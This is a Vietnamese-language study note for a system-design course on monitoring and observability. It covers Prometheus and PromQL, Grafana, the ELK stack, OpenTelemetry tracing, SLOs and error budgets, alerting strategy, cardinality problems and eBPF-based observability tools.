Tuần 13: Monitoring & Observability

“Một hệ thống production không có monitoring giống như lái máy bay trong đêm mà không có bảng điều khiển — bạn không biết mình đang bay ổn hay đang lao thẳng xuống đất.”

Tags: system-design monitoring observability prometheus grafana elk opentelemetry devops security Student: Hieu Prerequisite: Tuan-11-Microservices-Pattern · Tuan-12-CICD-Pipeline Liên quan: Tuan-02-Back-of-the-envelope · Tuan-05-Load-Balancer · Tuan-09-Rate-Limiter · Tuan-14-AuthN-AuthZ-Security · Tuan-15-Data-Security-Encryption

1. Context & Why

Analogy: Bảng điều khiển buồng lái máy bay (Cockpit Dashboard)

Hieu, tưởng tượng em là phi công đang lái một chiếc Boeing 777 chở 400 hành khách xuyên Thái Bình Dương. Trong buồng lái có hàng trăm đồng hồ và màn hình:

Altimeter (cao độ) → tương đương latency — hệ thống đang phản hồi nhanh hay chậm?
Airspeed indicator (tốc độ) → tương đương throughput/traffic — bao nhiêu request đang đi qua?
Fuel gauge (nhiên liệu) → tương đương saturation — CPU/memory/disk còn bao nhiêu?
Engine warning lights (đèn cảnh báo động cơ) → tương đương error rate — có gì đang hỏng không?
Black box recorder (hộp đen) → tương đương logs & traces — khi sự cố xảy ra, em tìm nguyên nhân từ đâu?
ATC communication (liên lạc kiểm soát không lưu) → tương đương alerting — ai thông báo cho em khi có vấn đề?

Không phi công nào bay mù (fly blind). Nếu tất cả đồng hồ tắt, quy trình bắt buộc là hạ cánh khẩn cấp. Tương tự, nếu hệ thống production không có monitoring, em đang “bay mù” — không biết khi nào sập, không biết tại sao sập, không biết sập ở đâu.

Tại sao Monitoring & Observability quan trọng?

Không có Monitoring	Có Monitoring & Observability
Khách hàng báo lỗi → mới biết hệ thống sập	Alert lúc 3AM → on-call engineer fix trước khi user biết
”Hệ thống chậm” — không biết chậm ở đâu	P99 latency tăng từ 50ms → 500ms tại service Payment
Debug bằng cách đọc code và đoán	Distributed trace cho thấy bottleneck ở DB query #47
Capacity planning = “cảm giác”	Metrics cho thấy CPU sẽ chạm 90% trong 14 ngày
Postmortem = “chắc do deploy mới”	Log + trace + metrics = root cause analysis chính xác

Monitoring vs Observability — Khác nhau thế nào?

	Monitoring	Observability
Câu hỏi	”Hệ thống có đang hoạt động không?"	"Tại sao hệ thống hoạt động như vậy?”
Approach	Known unknowns — biết trước cần theo dõi gì	Unknown unknowns — khám phá vấn đề chưa lường trước
Output	Dashboard, alerts	Khả năng drill-down, correlate, explore
Analogy	Đèn check engine trên xe	Kỹ sư cắm máy chẩn đoán OBD-II vào xe
Ví dụ	CPU > 90% → alert	”Tại sao latency tăng 3x chỉ cho user ở VN vào lúc 9PM?”

Monitoring là subset của Observability. Monitoring nói cho em biết cái gì hỏng. Observability giúp em hiểu tại sao nó hỏng — ngay cả khi em chưa từng gặp lỗi đó trước đây.

2. Deep Dive — Các khái niệm cốt lõi

2.1 Ba trụ cột của Observability (Three Pillars)

┌─────────────────────────────────────────────────┐
│              OBSERVABILITY                        │
│                                                   │
│   ┌──────────┐  ┌──────────┐  ┌──────────────┐  │
│   │ METRICS  │  │  LOGS    │  │   TRACES     │  │
│   │          │  │          │  │              │  │
│   │ "What"   │  │ "Why"    │  │ "Where"      │  │
│   │ is       │  │ did it   │  │ did it       │  │
│   │ happening│  │ happen   │  │ happen       │  │
│   └──────────┘  └──────────┘  └──────────────┘  │
│                                                   │
│   Prometheus     ELK Stack    OpenTelemetry       │
│   Grafana        Fluentd      Jaeger / Zipkin     │
│   Datadog        Loki                             │
└─────────────────────────────────────────────────┘

Pillar 1: Metrics (Số liệu đo lường)

Metrics là dữ liệu dạng số (numeric), biểu diễn trạng thái của hệ thống tại một thời điểm, được thu thập theo interval cố định.

Metric Type	Mô tả	Ví dụ
Counter	Giá trị chỉ tăng, reset khi restart	`http_requests_total`, `errors_total`
Gauge	Giá trị tăng hoặc giảm	`cpu_usage_percent`, `memory_used_bytes`, `active_connections`
Histogram	Phân phối giá trị vào các bucket	`http_request_duration_seconds` (p50, p90, p99)
Summary	Tương tự histogram nhưng tính quantile phía client	`go_gc_duration_seconds`

Khi nào dùng Histogram vs Summary?

Histogram: Khi cần aggregate across instances (phổ biến hơn, dùng với Prometheus)

Summary: Khi cần quantile chính xác trên single instance, không cần aggregate

Đặc điểm quan trọng của Metrics:

Cheap to store: Mỗi data point chỉ ~16 bytes (timestamp + value)
Fast to query: Time-series database tối ưu cho range queries
Good for alerting: Dễ đặt threshold
Nhược điểm: Không có context chi tiết (chỉ biết “error rate tăng”, không biết “error gì, ở đâu, cho user nào”)

Pillar 2: Logs (Nhật ký)

Logs là các event record rời rạc (discrete events), chứa thông tin chi tiết về điều gì đã xảy ra.

Ba dạng log phổ biến:

Dạng	Ví dụ	Ưu điểm	Nhược điểm
Plaintext	`2024-01-15 10:30:45 ERROR Payment failed for user 123`	Dễ đọc cho người	Khó parse, khó search
Structured (JSON)	`{"timestamp":"2024-01-15T10:30:45Z","level":"ERROR","service":"payment","user_id":"123","error":"insufficient_funds"}`	Machine-parseable, filterable	Verbose hơn
Binary	Protobuf-encoded log	Compact, fast	Cần tool đặc biệt để đọc

Best Practice: Luôn dùng Structured Logging (JSON). Lý do: khi hệ thống có 100 services, mỗi service 10K logs/second, em không thể grep plaintext. Em cần jq, Elasticsearch, hay Loki để filter service=payment AND level=ERROR AND user_id=123.

Structured Logging Fields chuẩn:

{
  "timestamp": "2024-01-15T10:30:45.123Z",
  "level": "ERROR",
  "service": "payment-service",
  "instance": "payment-7b4f9d8c-x2k9p",
  "trace_id": "abc123def456",
  "span_id": "span789",
  "user_id": "usr_12345",
  "method": "POST",
  "path": "/api/v1/payments",
  "status_code": 500,
  "duration_ms": 2345,
  "error": "database_connection_timeout",
  "message": "Failed to process payment: connection pool exhausted"
}

Pillar 3: Traces (Distributed Tracing)

Traces theo dõi một request khi nó đi qua nhiều services trong hệ thống phân tán (distributed system).

User Request (trace_id: abc-123)
│
├── [Span 1] API Gateway          ─── 2ms
│   ├── [Span 2] Auth Service     ─── 5ms
│   ├── [Span 3] Payment Service  ─── 150ms  ← Bottleneck!
│   │   ├── [Span 4] DB Query     ─── 120ms  ← Root cause!
│   │   └── [Span 5] Redis Cache  ─── 1ms
│   └── [Span 6] Notification Svc ─── 10ms
│
Total: 168ms

Các khái niệm quan trọng:

Term	Giải thích
Trace	Toàn bộ hành trình của 1 request qua hệ thống (gồm nhiều spans)
Span	Một operation đơn lẻ trong trace (ví dụ: 1 DB query, 1 HTTP call)
Trace ID	ID duy nhất identify toàn bộ trace, được propagate qua tất cả services
Span ID	ID duy nhất cho mỗi span
Parent Span ID	Span cha, tạo thành tree structure
Context Propagation	Cơ chế truyền trace_id/span_id giữa các services (thường qua HTTP headers)

Context Propagation Headers:

traceparent: 00-abc123def456-span789-01
tracestate: vendor=value

W3C Trace Context là chuẩn (standard) được OpenTelemetry sử dụng. Trước đó mỗi vendor có format riêng (Zipkin dùng X-B3-TraceId, Jaeger dùng uber-trace-id).

2.2 Prometheus Architecture — Hệ thống Metrics tiêu chuẩn

Prometheus là monitoring system open-source, được Cloud Native Computing Foundation (CNCF) graduated (cùng level với Kubernetes).

Kiến trúc tổng quan

┌──────────────────────────────────────────────────────────────┐
│                    PROMETHEUS ECOSYSTEM                        │
│                                                                │
│  ┌─────────────┐     PULL (scrape)     ┌──────────────────┐  │
│  │ Target Apps │ ◄──────────────────── │   Prometheus     │  │
│  │ /metrics    │      every 15s        │   Server         │  │
│  │             │                        │                  │  │
│  │ - app:8080  │                        │ ┌──────────────┐│  │
│  │ - node:9100 │                        │ │  Retrieval   ││  │
│  │ - mysql:9104│                        │ │  (Scraper)   ││  │
│  └─────────────┘                        │ └──────┬───────┘│  │
│                                          │        │        │  │
│  ┌─────────────┐                        │ ┌──────▼───────┐│  │
│  │ Service     │  service discovery     │ │    TSDB      ││  │
│  │ Discovery   │───────────────────────►│ │ (Time Series ││  │
│  │             │                        │ │  Database)   ││  │
│  │ - k8s API   │                        │ └──────┬───────┘│  │
│  │ - consul    │                        │        │        │  │
│  │ - DNS       │                        │ ┌──────▼───────┐│  │
│  │ - file_sd   │                        │ │   PromQL     ││  │
│  └─────────────┘                        │ │ (Query Lang) ││  │
│                                          │ └──────┬───────┘│  │
│                                          └────────┼────────┘  │
│                                                   │           │
│           ┌───────────────────┬───────────────────┤           │
│           │                   │                   │           │
│    ┌──────▼──────┐    ┌──────▼──────┐    ┌───────▼───────┐  │
│    │  Grafana    │    │ Alertmanager│    │ API Consumers │  │
│    │ (Dashboard) │    │             │    │               │  │
│    │             │    │ - Routing   │    │ - Custom UI   │  │
│    │ - Charts    │    │ - Grouping  │    │ - Scripts     │  │
│    │ - Alerts    │    │ - Silencing │    │ - CI/CD       │  │
│    │ - Tables    │    │ - Inhibit   │    └───────────────┘  │
│    └─────────────┘    │             │                        │
│                        │ ┌─────────┐│                        │
│                        │ │PagerDuty││                        │
│                        │ │Slack    ││                        │
│                        │ │Email    ││                        │
│                        │ └─────────┘│                        │
│                        └─────────────┘                        │
└──────────────────────────────────────────────────────────────┘

Pull-based Model (Tại sao Prometheus “kéo” thay vì “nhận”?)

	Pull (Prometheus)	Push (Datadog, InfluxDB)
Cơ chế	Prometheus chủ động gọi tới `/metrics` endpoint	App chủ động gửi metrics tới collector
Ưu điểm	Dễ biết target còn sống (nếu scrape fail → target down); Không cần config phía app	App không cần biết collector ở đâu; Tốt cho short-lived jobs
Nhược điểm	Cần service discovery; Khó cho short-lived jobs	Khó phát hiện target chết; DDoS risk nếu nhiều app push cùng lúc
Giải pháp	Dùng Pushgateway cho batch/cron jobs	Rate limiting phía collector

TSDB — Time Series Database

Prometheus lưu dữ liệu trong TSDB tự phát triển, tối ưu cho time-series data:

Cấu trúc data:

metric_name{label1="value1", label2="value2"} value timestamp

# Ví dụ:
http_requests_total{method="GET", path="/api/users", status="200"} 15234 1705312245
http_requests_total{method="POST", path="/api/orders", status="500"} 42 1705312245
node_cpu_seconds_total{cpu="0", mode="idle"} 98234.56 1705312245

TSDB Internal Structure:

data/
├── 01BKGV7JBM69T2G1BGBGM6KB12/   # Block (2h default)
│   ├── chunks/                      # Compressed time-series data
│   │   └── 000001
│   ├── tombstones                   # Deleted data markers
│   ├── index                        # Inverted index (label → series)
│   └── meta.json                    # Block metadata
├── 01BKGTZQ1SYQJTR4PB43C8PD98/   # Another block
├── 01BKGTZQ1HHWHV8FBJXW1Y3W0K/
├── chunks_head/                     # Current (in-memory) block
│   └── 000001
└── wal/                             # Write-Ahead Log
    ├── 000000002
    └── 000000003

Block: Mỗi block chứa data của 2 giờ (default), immutable sau khi compact
Compaction: Blocks cũ được merge để giảm I/O khi query
WAL (Write-Ahead Log): Đảm bảo data không mất khi crash trước khi persist vào block
Retention: Default 15 ngày, configurable

PromQL — Prometheus Query Language

PromQL là ngôn ngữ query mạnh mẽ cho time-series data. Đây là kỹ năng bắt buộc cho mọi DevOps/SRE engineer.

Các query quan trọng nhất:

# === INSTANT VECTOR (giá trị tại 1 thời điểm) ===
 
# Tổng request hiện tại
http_requests_total
 
# Filter bằng label
http_requests_total{method="GET", status=~"2.."}
 
# === RANGE VECTOR (giá trị trong khoảng thời gian) ===
 
# Request trong 5 phút gần nhất
http_requests_total[5m]
 
# === FUNCTIONS ===
 
# Rate: số request/giây trung bình trong 5 phút (quan trọng nhất!)
rate(http_requests_total[5m])
 
# QPS theo method
sum by (method) (rate(http_requests_total[5m]))
 
# Error rate (%)
sum(rate(http_requests_total{status=~"5.."}[5m]))
/
sum(rate(http_requests_total[5m]))
* 100
 
# P99 latency (từ histogram)
histogram_quantile(0.99,
  sum by (le) (rate(http_request_duration_seconds_bucket[5m]))
)
 
# P50 (median) latency per service
histogram_quantile(0.50,
  sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
)
 
# CPU usage (%)
100 - (avg by (instance) (rate(node_cpu_seconds_total{mode="idle"}[5m])) * 100)
 
# Memory usage (%)
(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100
 
# Disk sẽ đầy trong bao lâu (predictive)
predict_linear(node_filesystem_avail_bytes[7d], 30*24*3600)
 
# Top 5 endpoints theo QPS
topk(5, sum by (path) (rate(http_requests_total[5m])))
 
# Increase (tổng tăng trong khoảng thời gian — dùng cho counter)
increase(http_requests_total{status="500"}[1h])

2.3 Grafana Dashboards

Grafana là nền tảng visualization tiêu chuẩn, hỗ trợ nhiều datasource (Prometheus, Elasticsearch, Loki, InfluxDB, CloudWatch…).

Dashboard tổ chức theo layers:

Layer	Dashboard	Mục đích
Business	Revenue, Active Users, Conversion Rate	Stakeholder, Product Manager
Application	QPS, Latency, Error Rate, Saturation	Developers, SRE
Infrastructure	CPU, Memory, Disk, Network	SRE, DevOps
Database	Query latency, Connection pool, Replication lag	DBA, Backend
Network	Packet loss, Bandwidth, DNS resolution	Network Engineer

2.4 ELK Stack — Centralized Logging

ELK = Elasticsearch + Logstash + Kibana (bây giờ thường gọi là Elastic Stack vì có thêm Beats).

┌──────────┐    ┌──────────┐    ┌───────────────┐    ┌──────────┐
│  Apps    │    │  Beats   │    │   Logstash    │    │ Elastic  │
│          │───►│(Filebeat)│───►│               │───►│ search   │
│ stdout/  │    │          │    │ - Parse       │    │          │
│ file log │    │ Lightwt  │    │ - Transform   │    │ Index &  │
│          │    │ shipper  │    │ - Enrich      │    │ Search   │
└──────────┘    └──────────┘    │ - Filter PII  │    └────┬─────┘
                                └───────────────┘         │
                                                    ┌─────▼─────┐
                                                    │  Kibana   │
                                                    │           │
                                                    │ - Search  │
                                                    │ - Visualize│
                                                    │ - Dashboard│
                                                    │ - Alerting │
                                                    └───────────┘

Mỗi component đóng vai trò gì?

Component	Vai trò	Analogy
Beats (Filebeat)	Lightweight agent, đọc log files và forward	Bưu tá thu thư ở mỗi nhà
Logstash	Data processing pipeline: parse, transform, enrich, filter	Bưu điện phân loại thư
Elasticsearch	Distributed search & analytics engine, lưu trữ + index logs	Thư viện khổng lồ có catalog
Kibana	Web UI để search, visualize, tạo dashboard	Thủ thư giúp tìm sách

Alternative nhẹ hơn: PLG Stack (Promtail + Loki + Grafana) — Grafana Loki thiết kế giống Prometheus nhưng cho logs, index chỉ labels (không full-text index như Elasticsearch), rẻ hơn nhiều về storage.

2.5 Distributed Tracing — OpenTelemetry, Jaeger, Zipkin

OpenTelemetry (OTel)

OpenTelemetry là chuẩn mở (open standard) cho observability, merge từ OpenTracing + OpenCensus. Đây là CNCF project, vendor-neutral.

Tại sao OTel quan trọng?

Vendor lock-in elimination: Instrument 1 lần, export tới bất kỳ backend (Jaeger, Zipkin, Datadog, New Relic, Grafana Tempo…)
Unified API: Một SDK cho cả Metrics + Logs + Traces
Auto-instrumentation: Libraries cho hầu hết framework (Express, Flask, Spring Boot…)
Industry standard: AWS, Google, Microsoft, Datadog đều support

┌─────────────────────────────────────────────────────────┐
│               OPENTELEMETRY ARCHITECTURE                 │
│                                                           │
│  ┌──────────┐  ┌──────────┐  ┌──────────┐               │
│  │ Service A│  │ Service B│  │ Service C│               │
│  │ (OTel    │  │ (OTel    │  │ (OTel    │               │
│  │  SDK)    │  │  SDK)    │  │  SDK)    │               │
│  └────┬─────┘  └────┬─────┘  └────┬─────┘               │
│       │              │              │                     │
│       └──────────────┼──────────────┘                     │
│                      │                                    │
│              ┌───────▼────────┐                           │
│              │  OTel Collector│                           │
│              │                │                           │
│              │ ┌────────────┐ │                           │
│              │ │ Receivers  │ │  OTLP, Jaeger, Zipkin    │
│              │ └─────┬──────┘ │                           │
│              │ ┌─────▼──────┐ │                           │
│              │ │ Processors │ │  Batch, Filter, Sample   │
│              │ └─────┬──────┘ │                           │
│              │ ┌─────▼──────┐ │                           │
│              │ │ Exporters  │ │  Jaeger, Zipkin, OTLP    │
│              │ └─────┬──────┘ │                           │
│              └───────┼────────┘                           │
│                      │                                    │
│         ┌────────────┼────────────┐                       │
│         │            │            │                       │
│    ┌────▼───┐  ┌─────▼────┐  ┌───▼──────┐               │
│    │ Jaeger │  │ Grafana  │  │ Datadog  │               │
│    │        │  │ Tempo    │  │ / others │               │
│    └────────┘  └──────────┘  └──────────┘               │
└─────────────────────────────────────────────────────────┘

Jaeger vs Zipkin

	Jaeger	Zipkin
Tác giả	Uber (CNCF graduated)	Twitter (open-source)
Ngôn ngữ	Go	Java
Storage	Cassandra, Elasticsearch, Kafka, Badger	Cassandra, Elasticsearch, MySQL
UI	Richer, dependency graph	Simpler, lightweight
Sampling	Adaptive sampling (head + tail)	Fixed-rate sampling
Khi nào dùng	Production lớn, cần adaptive sampling	Setup nhanh, hệ thống nhỏ-trung

2.6 SLO / SLA / SLI — Ngôn ngữ chung của Reliability

Ba khái niệm này là nền tảng của Site Reliability Engineering (SRE), được Google popularize.

Term	Viết tắt của	Giải thích	Ví dụ
SLI	Service Level Indicator	Metric đo lường quality of service	Tỷ lệ request thành công: 99.95%
SLO	Service Level Objective	Mục tiêu nội bộ cho SLI	”99.9% request phải trả về trong < 200ms”
SLA	Service Level Agreement	Hợp đồng với khách hàng, có hậu quả nếu vi phạm	”Nếu uptime < 99.95%, khách được hoàn 10% phí”

Quan hệ: SLI (đo) → SLO (mục tiêu nội bộ, chặt hơn SLA) → SLA (cam kết với khách hàng)

Ví dụ cụ thể cho một API service:

SLI	SLO	SLA
Availability (% request success)	99.95% trong 30 ngày	99.9% — vi phạm thì credit 10%
Latency P99	< 200ms	< 500ms — vi phạm thì credit 5%
Error rate	< 0.05%	< 0.1% — vi phạm thì credit 5%

Error Budget — Ngân sách lỗi

Error Budget = lượng “lỗi cho phép” dựa trên SLO. Đây là khái niệm cực kỳ quan trọng vì nó biến reliability thành con số đo được.

E rror B u d g e t = 1 - S L O

Ví dụ: SLO = 99.9% availability trong 30 ngày

E rror B u d g e t = 1 - 0.999 = 0.001 = 0.1%

A ll o w e d d o w n t im e = 30 d a ys \times 24 h o u rs \times 60 min u t es \times 0.001 = 43.2 min u t es / m o n t h

Error Budget Policy (chính sách khi ngân sách cạn):

Error Budget remaining	Action
> 50%	Normal development, deploy freely
25% – 50%	Tăng review, limit risky deploys
5% – 25%	Feature freeze, focus stability
0% (exhausted)	Code freeze — chỉ được fix bugs và improve reliability

Aha Moment: Error budget tạo cân bằng giữa velocity (ship features nhanh) và reliability (hệ thống ổn định). Không còn tranh cãi “Dev muốn deploy, Ops muốn stable” — error budget là con số khách quan.

2.7 Golden Signals — 4 tín hiệu vàng (Google SRE Book)

Google đề xuất 4 metrics quan trọng nhất cần monitor cho mọi service:

Signal	Giải thích	PromQL Example
Latency	Thời gian xử lý request (phân biệt success vs error latency)	`histogram_quantile(0.99, sum by(le)(rate(http_request_duration_seconds_bucket[5m])))`
Traffic	Lượng demand (request/s, transactions/s)	`sum(rate(http_requests_total[5m]))`
Errors	Tỷ lệ request thất bại (explicit 5xx, implicit: wrong result)	`sum(rate(http_requests_total{status=~"5.."}[5m])) / sum(rate(http_requests_total[5m]))`
Saturation	Mức độ “đầy” của resource (CPU, memory, disk, connections)	`(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes)`

Tại sao 4 signals này đủ? Vì chúng cover 4 câu hỏi: “Có chậm không?” (Latency), “Có nhiều không?” (Traffic), “Có lỗi không?” (Errors), “Có quá tải không?” (Saturation).

2.8 RED Method vs USE Method

Hai framework bổ sung cho Golden Signals, apply cho các loại component khác nhau:

RED Method (cho Services/Microservices — Tom Wilkie, Grafana Labs)

Metric	Giải thích	Áp dụng
Rate	Requests per second	Mọi service
Errors	Failed requests per second	Mọi service
Duration	Distribution of request latency	Mọi service

RED = Golden Signals trừ Saturation. Tập trung vào user experience.

USE Method (cho Resources/Infrastructure — Brendan Gregg, Netflix)

Metric	Giải thích	Áp dụng
Utilization	% thời gian resource bận	CPU, Disk, Network
Saturation	Lượng work bị queued/pending	Queue depth, swap usage
Errors	Error events	Hardware errors, network drops

USE áp dụng cho từng hardware resource: CPU, Memory, Disk I/O, Network I/O.

Khi nào dùng gì?

Đối tượng	Dùng	Ví dụ
API endpoint	RED	`/api/v1/payments` — Rate, Errors, Duration
Kubernetes pod	USE	CPU utilization, memory saturation, OOM errors
Database	Cả hai	RED cho queries; USE cho disk I/O, connections
Message queue	USE	Queue depth (saturation), consumer lag, message errors

2.9 Alerting Strategy — Chiến lược cảnh báo

Severity Levels

Level	Khi nào	Response Time	Ai nhận	Kênh
P1 / Critical	Service down, data loss, security breach	< 5 phút	On-call engineer + manager	PagerDuty (phone call), SMS
P2 / High	Degraded performance, partial outage	< 30 phút	On-call engineer	PagerDuty, Slack incidents
P3 / Warning	Approaching threshold, non-critical error spike	< 4 giờ (business hours)	Team lead	Slack alerts
P4 / Info	Anomaly detected, capacity planning	Next business day	Team via weekly review	Email, dashboard

Escalation Policy

Time 0    → On-call Primary receives alert
            ↓ (no ack in 5 min)
Time +5m  → On-call Secondary receives alert
            ↓ (no ack in 10 min)
Time +15m → Engineering Manager receives alert
            ↓ (no ack in 15 min)
Time +30m → VP Engineering / CTO receives alert
            ↓ (auto-conference bridge opened)
Time +45m → Incident Commander declared, war room

Alerting Best Practices

Do	Don’t
Alert on symptoms (user-facing: latency, errors)	Alert on causes (CPU high — might be fine during batch job)
Set alerts based on SLO burn rate	Set arbitrary thresholds without SLO context
Use multi-window alerting (5min AND 1hr)	Alert on single data point (noisy)
Include runbook link in alert	Send alert with no context or action
Page only for user-impacting issues	Page for every warning (alert fatigue)
Review and tune alerts monthly	Set and forget

SLO-based Alerting (Google’s Burn Rate)

Thay vì alert “error rate > 1%”, dùng burn rate — tốc độ tiêu thụ error budget:

B u r n R a t e = \frac{O b ser v e d E rror R a t e}{1 - S L O}

Ví dụ: SLO = 99.9%, observed error rate = 0.5%

B u r n R a t e = \frac{0.005}{0.001} = 5 x

→ Đang tiêu error budget nhanh gấp 5 lần cho phép. Nếu tiếp tục, error budget sẽ cạn trong $\frac{30}{5}$ = 6 ngày thay vì 30 ngày.

Multi-window alerting rules:

Severity	Burn Rate	Short Window	Long Window	Alert After
P1	14.4x	5 phút	1 giờ	Tức thì — budget cạn trong 2 ngày
P2	6x	30 phút	6 giờ	Budget cạn trong 5 ngày
P3	1x	6 giờ	3 ngày	Budget đang tiêu đúng tốc độ cạn cuối tháng

2.10 Cardinality Explosion Problem — Bẫy chết người

Cardinality = số lượng unique time series (unique combinations of metric name + label values).

Ví dụ an toàn:

http_requests_total{method="GET", status="200"}   # method: ~5 values, status: ~10 values
# Cardinality = 5 × 10 = 50 series → OK

Ví dụ NGUY HIỂM:

http_requests_total{method="GET", user_id="usr_12345", request_id="req_abc"}
# user_id: 10M values, request_id: infinite
# Cardinality = 5 × 10M × ∞ = EXPLOSION 💥

Tại sao cardinality explosion nguy hiểm?

Hệ quả	Chi tiết
Memory OOM	Prometheus giữ tất cả active series trong RAM
Query timeout	PromQL query trên 10M series → CPU 100%
Disk explosion	Mỗi series ~16 bytes/sample × 4 samples/min × 10M series = 640M/min = 922GB/day
Billing shock	Nếu dùng managed service (Datadog, Grafana Cloud) → mỗi custom metric = $$$

Quy tắc vàng: KHÔNG BAO GIỜ dùng high-cardinality values làm label:

User ID
Request ID / Trace ID
IP address
Email
URL path (nếu có path params: /users/123 → vô hạn)

Thay vào đó: Dùng labels với bounded cardinality (method, status_code, service_name, region, pod_name). Nếu cần user-level data → dùng Logs hoặc Traces, không phải Metrics.

2.11 Modern Observability — High-Cardinality Structured Events

Cập nhật 2024-2026: Honeycomb-style “high-cardinality structured events” đang dần thay thế tách bạch Metrics + Logs + Traces cũ. Đây là quan điểm hiện đại được Charity Majors (CTO Honeycomb) và Liz Fong-Jones formalize trong sách “Observability Engineering” (O’Reilly 2022).

2.11.1 Vấn đề của 3-Pillars truyền thống

Section 2.1 trên mô tả 3 trụ cột Metrics + Logs + Traces. Nhưng trong production hiện đại, có 3 vấn đề lớn:

Vấn đề	Chi tiết
Pre-aggregation kills detail	Metrics chỉ có aggregate (P99 = 200ms) — không biết WHO bị 200ms
Cardinality limits	Metrics không kham được user_id, request_id labels
3 silos không correlate dễ	Metric tăng → tìm log → tìm trace = 3 tools, 3 query languages
”Known unknowns” only	Phải biết trước cần monitor gì → “unknown unknowns” không thấy

2.11.2 Giải pháp: High-Cardinality Structured Events

Quan điểm cốt lõi: Mỗi request emit 1 wide event với hàng trăm fields:

{
  "timestamp": "2026-05-01T10:30:45.123Z",
  "service": "checkout-api",
  "instance": "checkout-7b4f9d8c-x2k9p",
  "region": "us-east-1",
  "trace_id": "abc123",
  "span_id": "span789",
 
  "user_id": "usr_12345",
  "user_tier": "premium",
  "user_country": "VN",
  "session_id": "sess_xyz",
 
  "request_method": "POST",
  "request_path": "/api/v1/checkout",
  "request_size_bytes": 2048,
 
  "response_status": 200,
  "response_size_bytes": 512,
  "duration_ms": 234,
 
  "db_query_count": 5,
  "db_total_time_ms": 145,
  "cache_hit": true,
  "cache_lookup_count": 3,
 
  "feature_flag_a": true,
  "feature_flag_b": false,
  "experiment_arm": "control",
 
  "build_id": "v2.45.1",
  "deploy_id": "deploy-abc",
 
  "downstream_service": "payment-api",
  "downstream_duration_ms": 89,
  "downstream_retry_count": 1,
 
  "error": null,
  "error_message": null,
  "warnings": ["slow_query"]
}

Mỗi field là một dimension để slice/dice.

Tại sao tốt hơn:

Có thể query: “P99 latency cho premium users tại VN với feature flag A bật, ở build v2.45.1, sau deploy gần đây”
“Unknown unknowns” → drill-down dynamic, không cần predefine dashboard
Single tool, single query language

2.11.3 So sánh: Metrics vs Structured Events

	Metrics (Prometheus)	Structured Events (Honeycomb-style)
Storage cost/event	~16 bytes (TSDB optimized)	~1-5KB (full event)
Cardinality	Thấp (~10K series/host)	Vô tận (mỗi event độc lập)
Aggregation	Pre-aggregated (P99 over 1m bucket)	On-the-fly (compute từ events)
Drill-down	Limited (chỉ labels có sẵn)	Unlimited (mọi field)
Cost	Cheap	Đắt hơn (mỗi event lưu full)
Best for	High-volume, low-cardinality (CPU, network)	High-cardinality, business logic insight

Lưu ý: Không phải thay thế hoàn toàn — complementary. Metrics vẫn cho infrastructure. Events cho application/business.

2.11.4 OpenTelemetry Span Events — Best of both

OpenTelemetry traces + span attributes có thể act như structured events. Mỗi span có thể attach unlimited attributes:

from opentelemetry import trace
 
tracer = trace.get_tracer(__name__)
 
@app.post("/checkout")
def checkout(user_id, items):
    with tracer.start_as_current_span("checkout") as span:
        # Set rich attributes (high-cardinality OK in traces)
        span.set_attribute("user.id", user_id)
        span.set_attribute("user.tier", get_user_tier(user_id))
        span.set_attribute("user.country", get_user_country(user_id))
        span.set_attribute("checkout.item_count", len(items))
        span.set_attribute("checkout.total_amount", calculate_total(items))
        span.set_attribute("feature.new_pricing", flag_enabled("new_pricing"))
        span.set_attribute("deploy.version", os.getenv("APP_VERSION"))
 
        # ... business logic
        return result

Sample rate: Trace data đắt hơn metrics → sample. Default: 1-10% sampling rate. Tail-based sampling: keep 100% errors + slow requests + 1% normal.

2.11.5 Vendors & tools

Tool	Approach	Best for
Honeycomb	Native high-card events	Pioneer, best UX
Datadog APM	Metrics + Traces + Logs in 1 platform	Enterprise, full-stack
New Relic	Same	Established
Grafana Tempo + Loki	OSS traces + logs	Self-hosted, cost-conscious
Lightstep / ServiceNow	Microservice deep dive	Microservice-heavy
OpenTelemetry + ClickHouse	DIY	Maximum flexibility

Tham chiếu:

Observability Engineering (Charity Majors, Liz Fong-Jones, George Miranda, O’Reilly 2022) — https://www.honeycomb.io/observability-engineering-oreilly-book
Charity Majors blog: https://charity.wtf/

2.12 eBPF Observability — Kernel-level Visibility

Cập nhật 2024-2026: eBPF-based observability (Pixie, Cilium Hubble, Parca) cung cấp visibility ở mức kernel mà không cần instrument application code.

2.12.1 Vấn đề của instrumentation truyền thống

Application-level instrumentation (OpenTelemetry SDK, Datadog agent):

Phải modify code (add SDK, decorators, middleware)
Language-specific: Python SDK ≠ Go SDK ≠ Rust SDK
Performance overhead: 1-10% CPU, depends on sampling
Doesn’t see kernel/network internals: TCP retransmits, syscall delays, scheduler latency

2.12.2 eBPF — Observability Without Code Changes

eBPF programs chạy trong kernel, observe mọi syscall, network packet, function call. Không cần modify application.

┌──────────────────────────────┐
│ Application (no SDK needed)   │
│ user-space syscall            │
└─────────────┬────────────────┘
              │
              ▼
┌──────────────────────────────┐
│  Linux Kernel                 │
│  ┌────────────────────────┐  │
│  │  eBPF probes attached  │  │
│  │  - kprobes (kernel fn) │  │
│  │  - uprobes (user fn)   │  │
│  │  - tracepoints         │  │
│  │  - XDP (network)       │  │
│  └─────────┬──────────────┘  │
└────────────┼─────────────────┘
             │ ring buffer
             ▼
┌──────────────────────────────┐
│  User-space collector         │
│  → Send to backend            │
└──────────────────────────────┘

Ưu điểm:

Lợi ích	Chi tiết
Zero code changes	Deploy DaemonSet, instant visibility cho mọi pod
Language-agnostic	Works cho Python, Go, Rust, Java, C++, anything
Kernel + network visibility	TCP retransmits, syscall latency, page faults — invisible từ app
Low overhead	< 1% CPU typical
Production-safe	Verifier ensure no infinite loops, no kernel panic

Nhược điểm:

Hạn chế	Chi tiết
Linux-only	Không chạy trên Windows/Mac (servers OK)
Kernel version requirement	eBPF features cần kernel 4.18+ (CO-RE: 5.5+)
Privileged	Cần CAP_BPF hoặc privileged container
Symbol resolution	Stripped binary → kernel không biết function name

2.12.3 eBPF Tools

Tool	Use case	URL
Pixie (CNCF)	Auto-instrument Kubernetes apps	https://px.dev/
Cilium Hubble	Network observability	https://docs.cilium.io/en/stable/gettingstarted/hubble/
Parca	Continuous profiling	https://www.parca.dev/
Pyroscope	Profiling	https://pyroscope.io/
bcc tools	CLI tools (e.g., `tcpconnect`, `biolatency`)	https://github.com/iovisor/bcc
bpftrace	DTrace-like for eBPF	https://github.com/iovisor/bpftrace

